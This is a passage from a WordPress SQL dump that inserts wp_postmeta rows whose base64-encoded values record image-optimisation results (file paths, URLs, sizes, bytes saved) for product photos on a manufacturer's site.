aGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODEyLCJ0aW1lIjoxNDgzNTUxODQwLCJpZCI6MTkxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjU1LCJ0aW1lIjoxNDgzNTUxODQzLCJpZCI6MTkxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1hbmQtbHVicmljYW50cy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzQ4LCJ0aW1lIjoxNDgzNTUxODQ3LCJpZCI6MTkxM31d'); 
INSERT INTO `wp_postmeta` VALUES (29006, 1912, 'wpfc_optimisation_reduction', '22157'); 
INSERT INTO `wp_postmeta` VALUES (29007, 1912, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTE4NTEsImlkIjoiMTkxMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MjksInRpbWUiOjE0ODM1NTE4NTQsImlkIjoxOTEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02OC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02OC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS02OC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg0MiwidGltZSI6MTQ4MzU1MTg1OCwiaWQiOjE5MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjEyLCJ0aW1lIjoxNDgzNTUxODYyLCJpZCI6MTkxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjgtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTA2NjMsInRpbWUiOjE0ODM1NTE4NjUsImlkIjoxOTEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02OC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02OC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS02OC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjU4LCJ0aW1lIjoxNDgzNTUxODY5LCJpZCI6MTkxMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjgtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU3MSwidGltZSI6MTQ4MzU1MTg3MiwiaWQiOjE5MTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTY4LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MzUsInRpbWUiOjE0ODM1NTE4NzUsImlkIjoxOTEyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02OC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02OC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS02OC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTY5MCwidGltZSI6MTQ4MzU1MTg3OSwiaWQiOjE5MTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjgtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU4NSwidGltZSI6MTQ4MzU1MTg4MiwiaWQiOjE5MTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjgtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjgtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk3MiwidGltZSI6MTQ4MzU1MTg4NSwiaWQiOjE5MTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29008, 1911, 'wpfc_optimisation_reduction', '22864'); 
INSERT INTO `wp_postmeta` VALUES (29009, 1911, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTE4OTAsImlkIjoiMTkxMSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5NTcsInRpbWUiOjE0ODM1NTE4OTMsImlkIjoxOTExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02Mi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02Mi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS02Mi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg4NiwidGltZSI6MTQ4MzU1MTg5NiwiaWQiOjE5MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNjE0LCJ0aW1lIjoxNDgzNTUxOTAwLCJpZCI6MTkxMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTEyNTEsInRpbWUiOjE0ODM1NTE5MDQsImlkIjoxOTExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02Mi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS02Mi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6Njc3LCJ0aW1lIjoxNDgzNTUxOTA3LCJpZCI6MTkxMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU1OCwidGltZSI6MTQ4MzU1MTkxMCwiaWQiOjE5MTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLTYyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MjQsInRpbWUiOjE0ODM1NTE5MTQsImlkIjoxOTExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02Mi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS02Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS02Mi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTc2MywidGltZSI6MTQ4MzU1MTkxNywiaWQiOjE5MTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjItMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU2NywidGltZSI6MTQ4MzU1MTkyMSwiaWQiOjE5MTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktNjItNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktNjItNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk2NywidGltZSI6MTQ4MzU1MTkyNCwiaWQiOjE5MTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29010, 1910, 'wpfc_optimisation_reduction', '20185'); 
INSERT INTO `wp_postmeta` VALUES (29011, 1910, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLTYxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLTYxLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTE5MjgsImlkIjoiMTkxMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLTYxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLTYxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSEVMT1hZLTYxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3NTQsInRpbWUiOjE0ODM1NTE5MzIsImlkIjoxOTEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS02MS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0hFTE9YWS02MS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0hFTE9YWS02MS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjU3MCwidGltZSI6MTQ4MzU1MTkzNSwiaWQiOjE5MTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLTYxLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSEVMT1hZLTYxLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtY